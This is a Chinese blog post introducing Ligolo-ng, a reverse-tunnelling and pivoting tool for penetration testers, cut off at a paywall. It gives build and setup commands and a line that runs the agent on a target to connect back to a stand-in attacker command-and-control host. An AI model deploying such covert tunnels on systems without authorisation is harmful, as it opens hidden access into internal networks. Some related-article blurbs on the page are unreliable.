【网络安全】无需SOCKS支持,帮助广大渗透测试人员建立一条隐蔽的通信信道

最新推荐文章于 2024-08-10 08:05:07 发布
最新推荐文章于 2024-08-10 08:05:07 发布
阅读量5.1k 收藏 1
点赞数
分类专栏: 网络 安全 程序员 文章标签: 网络安全 测试工具 tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/120475920
版权
Ligolo-ng是一款轻量级渗透测试工具,利用反向TCP/TLS连接创建隐蔽通信信道,无需SOCKS支持。它提供简单UI,自动化证书配置,并支持多平台代理,适用于网络安全测试人员。
摘要由CSDN通过智能技术生成

在这里插入图片描述

关于Ligolo-ng

Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。

功能介绍

Tun接口(不再需要SOCKS);

简单的UI界面,支持选择代理和网络信息;

易于使用,易于安装;

基于Let’s Encrypt的自动化证书配置;

高性能(多路复用);

不需要高级权限;

套接字监听/代理绑定;

多平台代理支持;

工具构建

构建Ligolo-ng

$ go build -o agent cmd/agent/main.go

$ go build -o proxy cmd/proxy/main.go

# Build agent for Windows

$ GOOS=windows go build -o agent.exe cmd/agent/main.go

安装Ligolo-ng
我们需要在自己的命令控制服务器上开启代理服务,默认使用11601端口监听:

$ sudo ip tuntap add user [your_username] mode tun ligolo

$ sudo ip link set ligolo up

$ ./proxy -h # Help options

$ ./proxy -autocert # Automatically request LetsEncrypt certificates

工具使用

首先,我们需要在目标设备上启动代理(无需特殊权限):

$ ./agent -connect attacker_c2_server.com:11601

此时,代理服务器上将出现一条会话链接:

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

使用“session”命令选择代理

最低0.47元/天 解锁文章
IT老涵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ligolo:渗透测试者可以通过反向测试使渗透测试者更加容易https
03-18
Ligolo渗透测试人员可以轻松进行反向隧穿 目录 介绍 Ligolo是一个简单轻巧的工具,可通过反向连接以完全安全的方式建立SOCKS5或TCP隧道(带椭圆曲线的TLS证书)。 这相当于把Meterpreter就会自动布线与SOCKS4A +,但更稳定,速度更快。 用例 您在外部审核期间破坏了Windows / Linux / Mac服务器。该服务器位于LAN网络内部,您想与该网络上的其他计算机建立连接。 Ligolo可以设置隧道来访问内部服务器的资源。 快速演示 使用代理链(WAN)中继RDP连接。 表现 这是两个100mb / s主机(ligolo / localrelay)之间的速度测试的屏幕截图。性能可能会因系统和网络配置而异。 用法 设置/编译 确保Go已安装并且正在运行。 获取Ligolo和依赖项 cd `go env GOPATH`/src git clone http
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具
gitblog_00081的博客
04-09 370
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具 ligolo-ng项目地址:https://gitcode.com/gh_mirrors/lig/ligolo-ng 是一个强大的、开源的网络嗅探和数据包分析工具,旨在帮助网络安全研究人员、开发人员和爱好者监控网络流量,发现潜在的安全问题和优化网络性能。它的设计思路简洁,易于使用,并且提供了一系列先进的功能,使得网络诊断变得更加直观和高效...
探索网络的利器:Ligolo - 简单易用的反向隧道工具
gitblog_00027的博客
05-13 281
探索网络的利器:Ligolo - 简单易用的反向隧道工具 ligoloReverse Tunneling made easy for pentesters, by pentesters https://sysdream.com/项目地址:https://gitcode.com/gh_mirrors/li/ligolo Ligolo 是一个专为渗透测试者设计的轻量级工具,它简化了在安全环境中建立S...
[内网安全]五.内网通信隐蔽隧道技术
PsgQ的博客
05-15 1380
作为网络安全爱好者,对内网的渗透学习必不可少。因此从今天开始从零开始记录自己的内网学习过程,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考徐焱老师的《内网安全攻防》这本书,并结合作者在安全牛课堂分享的学习讲解视频,且看且珍惜吧!督促自己完成每一个实验,把每一个细节搞懂,加油~ 文章目录隐蔽通信隧道基础知识什么是隧道:常用的隧道技术:防火墙安装内网连通性判断1 ICMP协议2 TCP协议3 HTTP协议4 DNS协议5 代理服务器网络层隧道1 IPv6隧
网络安全-渗透完整笔记
03-27
网络安全中的渗透测试是一种合法的、经过授权的模拟黑客攻击行为,旨在评估并增强网络系统安全性。渗透测试通过发现和利用系统中的弱点、技术缺陷或漏洞,帮助企业和组织识别潜在的安全风险,确保网络防御机制的有效...
python实现测试tcp握手往返延时,支持IPv4/IPv6,通过Socks5/HTTP-PROXY进行二阶段网络连通性测试
08-05
python实现测试tcp握手往返延时,支持IPv4/IPv6,通过Socks5/HTTP_PROXY进行二阶段网络连通性测试+源码+项目文档,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,...
rpivot:socks4反向代理,用于渗透测试
05-01
RPIVOT-反向袜子4渗透测试的代理 RPIVOT允许通过套接字4将流量隧道传输到内部网络。它的工作方式类似于ssh动态端口转发,但方向相反。 描述 该工具与Python 2.6-2.7兼容,除了标准库外没有任何依赖项。 它具有客户端...
信息安全_基于mstsc的高级渗透.墨云科技@落落.pptx
08-14
综上所述,基于mstsc的高级渗透技术涵盖了RDP协议的安全漏洞利用、认证机制绕过和隐秘通信等多方面,对网络安全构成了严重威胁。因此,对RDP服务的安全配置、更新补丁以及强化用户凭证管理显得尤为重要,以防止此类...
socks5-C xor rc4 加密通信流量
04-10
socks5-C xor rc4 加密通信流量
隐蔽信道分析及测试
10-27
关于隐蔽信道的小总结,隐蔽通道利用现有的隐蔽、穿透技术在网络中传输数据,隐藏机密信息,从而达到隐蔽目的,使窃密的传输过程不被发现,即使被发现也不能查证。路径不能被追踪查看,从而隐蔽攻击源。
隐蔽信道学习
Fiverya的博客
01-09 1691
隐私隧道
Ligolo-ng 安装与使用教程
最新发布
gitblog_00009的博客
08-10 351
Ligolo-ng 安装与使用教程 ligolo-ngAn advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.项目地址:https://gitcode.com/gh_mirrors/li/ligolo-ng 1. 项目介绍 Ligolo-ng 是一个轻量级、快速的工具,专为渗透测试者设计,用于通过反向T...
【基础知识】隐藏通信隧道技术
苏柳欣的博客
04-19 5859
基础知识什么是通信隧道什么是边缘设备(edge device)各层常用隧道举例 什么是通信隧道 在这里研究的隧道,具体就是一种绕过端口屏蔽的方式。举个🌰 ,比如在一个防火墙两端进行数据通信,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,进而通过防火墙,在防火墙两端进行通信,防火墙两端开辟的路径就相当于是一个隧道。另外,数据包经过防火墙会被封装,出去之后会解封。 什么是边缘设备(edge device) 参考链接:https://zh.wikipedia.org/wiki/边缘https
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5323
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
隐蔽信道相关概念(持续更)
热门推荐
m0_37442062的博客
05-11 1万+
通常,黑客会使用隐蔽网络躲避防火墙和IDS等。通过不可检测的网络从目标主机窃取数据的网络被称为隐蔽信道,而这些流量在网络监控设备/应用和网络管理员看来像是一般的正常流量。两个端点用户可以利用隐蔽信道,进行无法被检测到的网络通信。 什么是隐蔽信道(covert channel)? 隐蔽一词意味着“隐藏或不可检测”,而信道是“通信模式”,因此隐蔽信道表示不可检测的通信网络。了解加密通信隐蔽...
服务器连接工具_Ligolo:一款反向隧道工具
weixin_39860108的博客
12-04 395
LigoloLigolo是一款专为安全测试人员设计的反向隧道工具。实际上,它是一款实现和使用都非常简单的轻量级工具,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的运行速度更快,并且更加稳定。功能介绍1、TLS 1.3隧道,带有TLS绑定;2、多平台支持,包括...
国内隐蔽通信技术和专利整理
weixin_43454147的博客
05-07 1384
[AI in sec]-039 DNS隐蔽信道的检测-特征构建
学-> 思->用
04-07 114
DCC是指利用DNS数据包中的可定义字段秘密传递信息的通道。其中,“DNS 协议”是目前网络上使用的标准域名解析协议;“可定义字段”是DNS 数据包中的 QNAME 字段、RDATA 字段及RawUDP字段。利用DNS数据包可以构建2种信道:存储信道及时间信道
使用EarthWorm创建Socks5代理进行内网渗透教程
这个过程对于安全研究人员进行合法的渗透测试和漏洞扫描至关重要,但必须遵守道德和法律规范,仅用于授权的测试环境,不得用于非法入侵或破坏活动。在实际操作中,确保了解并遵守所有适用的法律法规,以及遵循网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值